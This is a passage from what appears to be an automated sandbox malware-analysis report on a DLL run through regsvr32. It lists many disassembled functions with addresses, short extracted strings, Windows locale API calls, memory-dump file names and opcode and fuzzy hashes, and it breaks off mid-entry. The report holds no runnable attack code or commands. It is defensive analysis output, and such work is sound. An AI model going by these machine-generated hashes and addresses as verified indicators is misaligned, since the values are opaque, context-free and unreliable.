Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013150 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

/0, xrefs: 00000001800131B1
XyLe, xrefs: 0000000180013245

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /0$XyLe
API String ID: 0-3562702181
Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800190D4 Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

>I, xrefs: 000000018001910D
>I, xrefs: 00000001800191E1

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: >I$>I
API String ID: 0-3948471910
Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001DA80 Relevance: 2.6, Strings: 2, Instructions: 86COMMON

Download Yara Rule

Strings

{H2}, xrefs: 000000018001DB0E
}i#c, xrefs: 000000018001DB7A

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: {H2}$}i#c
API String ID: 0-1724349491
Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800269B0 Relevance: 2.6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

Strings

so, xrefs: 0000000180026A7A
4V, xrefs: 0000000180026AB2

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4V$so
API String ID: 0-1060102820
Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800296EC Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

F+', xrefs: 000000018002985C
O$, xrefs: 000000018002973D

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: F+'$O$
API String ID: 0-4064122715
Opcode ID: 65d5816d26685df18d8fe2bf41853c6ad5a30473c75acd7588c5af8b031b1464
Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
Opcode Fuzzy Hash: 65d5816d26685df18d8fe2bf41853c6ad5a30473c75acd7588c5af8b031b1464
Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800121CC Relevance: 2.6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

1, xrefs: 00000001800121E3
bO6, xrefs: 000000018001228D

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$bO6
API String ID: 0-3242911120
Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019D60 Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

)j-J, xrefs: 0000000180019DA5
\rba, xrefs: 0000000180019D7E

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )j-J$\rba
API String ID: 0-105394296
Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024698 Relevance: 2.6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

Strings

7c, xrefs: 000000018002471E
5T, xrefs: 00000001800246BF

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5T$7c
API String ID: 0-2666566123
Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017BDC Relevance: 2.6, Strings: 2, Instructions: 60COMMON

Download Yara Rule

Strings

PX, xrefs: 0000000180017C43
",)x, xrefs: 0000000180017C8A

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ",)x$PX
API String ID: 0-926260526
Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EC39C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7EC3DD

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
Instruction ID: 976fb805dc538b3dd276e33841ab4f19a73a14efe7fbf9488fbf9d529933ead1
Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
Instruction Fuzzy Hash: 89118236A08BE64FEA605E76E4913B92790AF857C8F544031DE8D862B5CE2CE5468311

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EC834 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32 ref: 00007FF8CB7EC884

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
Instruction ID: 15f960296654836ef24c88ddb759d281a2a7c2cb22c39a34c561acbffa8babed
Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
Instruction Fuzzy Hash: 7B115E7AA08B558BFB588F32C1153793690EF94B89F084435CE0D522B6CB7CD594C685

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EC8C8 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8CB7E5A8C), ref: 00007FF8CB7EC8FD

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
Instruction ID: 4250b8666504ae105e4b7ed308523658aa5603cee79bf5dae950f06c6490d7d2
Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
Instruction Fuzzy Hash: C5F0A466E08F964FF7188F32D4163BA27D1AF94B89F198031CE4D422F6CF6CD6918240

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EDF3C Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8CB7E2534: _getptd.LIBCMT ref: 00007FF8CB7E254A

GetLocaleInfoW.KERNEL32 ref: 00007FF8CB7EDF6C

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
Instruction ID: 6e9a9bbf617d4080392253b0426be9588c409692e8833062c95924ab753ca242
Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
Instruction Fuzzy Hash: F7F05432A18BD083D7118B16F44455AB761FBC4BE0F584221EA9D17BA9CE2CC856CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EE1E8 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7EE210

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
Instruction ID: 962be145d45d8a4f8b73ce6cb468485ca831e1bcb5826676f406af14dba72af8
Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
Instruction Fuzzy Hash: C5E03021A0CF9187F6209F12A8012AA3750AF98798F900231EE9D466B5DE2CE3058A04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EC7F4 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32 ref: 00007FF8CB7EC81E

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
Instruction ID: 65a34f3333806ede8163cd373935de261c2001307a522c1eecc62d8a12c428d0
Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
Instruction Fuzzy Hash: 6DE04F66E08B4547EB088F72D5443642251EF98B49F088031CE0C011B5CF7CD696C640

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800125C4 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

cYte, xrefs: 00000001800128D1

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: cYte
API String ID: 0-489798635
Opcode ID: 4acd880b1b9242ae3f66c3fdc32505bc5e4dc901df3d7cd7ffb66f12f89e51a1
Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
Opcode Fuzzy Hash: 4acd880b1b9242ae3f66c3fdc32505bc5e4dc901df3d7cd7ffb66f12f89e51a1
Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002A9A8 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

Pc, xrefs: 000000018002AC68

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Pc
API String ID: 0-2609325410
Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001ED50 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

g >, xrefs: 000000018001EF27

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g >
API String ID: 0-3862707646
Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018DAC Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

2, xrefs: 0000000180018DDB

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2
API String ID: 0-2012265552
Opcode ID: fb4f60d061479647d3fac6d2f693c32068a5ad75f13adf9d903438d0578f57c4
Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
Opcode Fuzzy Hash: fb4f60d061479647d3fac6d2f693c32068a5ad75f13adf9d903438d0578f57c4
Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800288B8 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

Wcl, xrefs: 0000000180028B98

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Wcl
API String ID: 0-2623992880
Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180029888 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

ws8, xrefs: 00000001800299E0

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ws8
API String ID: 0-2196714860
Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017908 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

p/g, xrefs: 0000000180017A5F

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: p/g
API String ID: 0-1786412500
Opcode ID: 12e0429f3d25b53aa03a660b5e037e54bcd2ac93df657abae010b2d02fa62e0c
Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
Opcode Fuzzy Hash: 12e0429f3d25b53aa03a660b5e037e54bcd2ac93df657abae010b2d02fa62e0c
Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000131C Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

%, xrefs: 0000000180001481

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %
API String ID: 0-3714942587
Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D8C4 Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

A.}, xrefs: 000000018000DA2D

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: A.}
API String ID: 0-2880059976
Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001D68 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

0#, xrefs: 0000000180001DF0

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0#
API String ID: 0-456275806
Opcode ID: 2a5e92d38432702302bb854991be2d1fec0b328a8259ee1ce7fe1531fc30a302
Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
Opcode Fuzzy Hash: 2a5e92d38432702302bb854991be2d1fec0b328a8259ee1ce7fe1531fc30a302
Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008CA0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

n), xrefs: 0000000180008DD6

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: n)
API String ID: 0-1227437150
Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001EB30 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

H&0, xrefs: 000000018001EBA0

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: H&0
API String ID: 0-1691334370
Opcode ID: 176f3dafecf3041be65652fa330368668244bab9b7972e65e66ffc3ed07b0be6
Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
Opcode Fuzzy Hash: 176f3dafecf3041be65652fa330368668244bab9b7972e65e66ffc3ed07b0be6
Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002870C Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

<+o, xrefs: 000000018002884F

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <+o
API String ID: 0-2035106886
Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
